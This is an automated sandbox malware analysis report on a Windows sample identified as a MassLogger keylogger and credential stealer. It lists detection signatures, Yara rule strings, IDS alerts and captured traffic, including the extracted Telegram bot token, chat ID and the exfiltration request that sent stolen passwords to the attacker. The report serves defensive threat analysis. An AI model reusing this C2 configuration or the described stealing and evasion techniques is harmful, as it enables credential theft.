Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mnXS9meqtB.exe

Overview

General Information

Sample name:mnXS9meqtB.exe
renamed because original name is a hash value
Original sample name:8bf61f3a1d267156d16c19ef19476210c7aca81406afafd7abbf139a5ccf61a1.exe
Analysis ID:1589080
MD5:aa367f8d203cd02f8a82a1a351baf271
SHA1:60c3c395682962497b9425572b869052d2eb4135
SHA256:8bf61f3a1d267156d16c19ef19476210c7aca81406afafd7abbf139a5ccf61a1
Tags:exeMassLoggeruser-adrian__luca
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mnXS9meqtB.exe (PID: 6836 cmdline: "C:\Users\user\Desktop\mnXS9meqtB.exe" MD5: AA367F8D203CD02F8A82A1A351BAF271)
    • RegSvcs.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\mnXS9meqtB.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU", "Telegram Chatid": "1695799026"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x1d811:$a1: get_encryptedPassword
          • 0x1d7e5:$a2: get_encryptedUsername
          • 0x1d8a9:$a3: get_timePasswordChanged
          • 0x1d7c1:$a4: get_passwordField
          • 0x1d827:$a5: set_encryptedPassword
          • 0x1d5f4:$a7: get_logins
          • 0x1cb66:$a8: GetOutlookPasswords
          • 0x1c07a:$a9: StartKeylogger
          • 0x1aadb:$a10: KeyLoggerEventArgs
          • 0x1aaaa:$a11: KeyLoggerEventArgsEventHandler
          • 0x1d6c8:$a13: _encryptedPassword
          Click to see the 27 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 65 88 44 24 2B 88 44 24 2F B0 77 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          2.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 65 88 44 24 2B 88 44 24 2F B0 77 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          0.2.mnXS9meqtB.exe.3150000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 65 88 44 24 2B 88 44 24 2F B0 77 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          2.2.RegSvcs.exe.40de898.6.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            2.2.RegSvcs.exe.40de898.6.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 94 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T09:15:31.912304+010020577441Malware Command and Control Activity Detected192.168.2.1249713149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T09:15:24.902370+010028032742Potentially Bad Traffic192.168.2.1249711193.122.6.16880TCP
              2025-01-11T09:15:30.980555+010028032742Potentially Bad Traffic192.168.2.1249711193.122.6.16880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T09:15:31.627549+010018100081Potentially Bad Traffic192.168.2.1249713149.154.167.220443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU", "Telegram Chatid": "1695799026"}
              Source: RegSvcs.exe.6892.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendMessage"}
              Multi AV Scanner detection for submitted file
              Source: mnXS9meqtB.exeVirustotal: Detection: 56%Perma Link
              Source: mnXS9meqtB.exeReversingLabs: Detection: 79%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: mnXS9meqtB.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: mnXS9meqtB.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49712 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49713 version: TLS 1.2
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: mnXS9meqtB.exe, 00000000.00000003.2334385755.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000003.2336836817.0000000003640000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: mnXS9meqtB.exe, 00000000.00000003.2334385755.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000003.2336836817.0000000003640000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00346CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00346CA9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003460DD
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003463F9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0034EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0034EB60
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0034F56F FindFirstFileW,FindClose,0_2_0034F56F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0034F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0034F5FA
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00351B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00351B2F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00351C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00351C8A
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00351F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00351F94
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_02B1E0B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0306F179h2_2_0306EEC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0306F8CFh2_2_0306F4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0306F8CFh2_2_0306F7FC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0306F8CFh2_2_0306F49F

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.12:49713 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.12:49713 -> 149.154.167.220:443
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695799026&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ee33dc5b19Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49711 -> 193.122.6.168:80
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49712 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00354EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00354EB5
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695799026&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ee33dc5b19Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000318C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003119000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778781040.0000000005432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: RegSvcs.exe, 00000002.00000002.4777410564.00000000031C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
              Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695
              Source: RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189x
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49713 version: TLS 1.2
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00356B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00356B0C
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00356D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00356D07
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00356B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00356B0C
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00342B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00342B37
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0036F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0036F7FF

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0.2.mnXS9meqtB.exe.3150000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
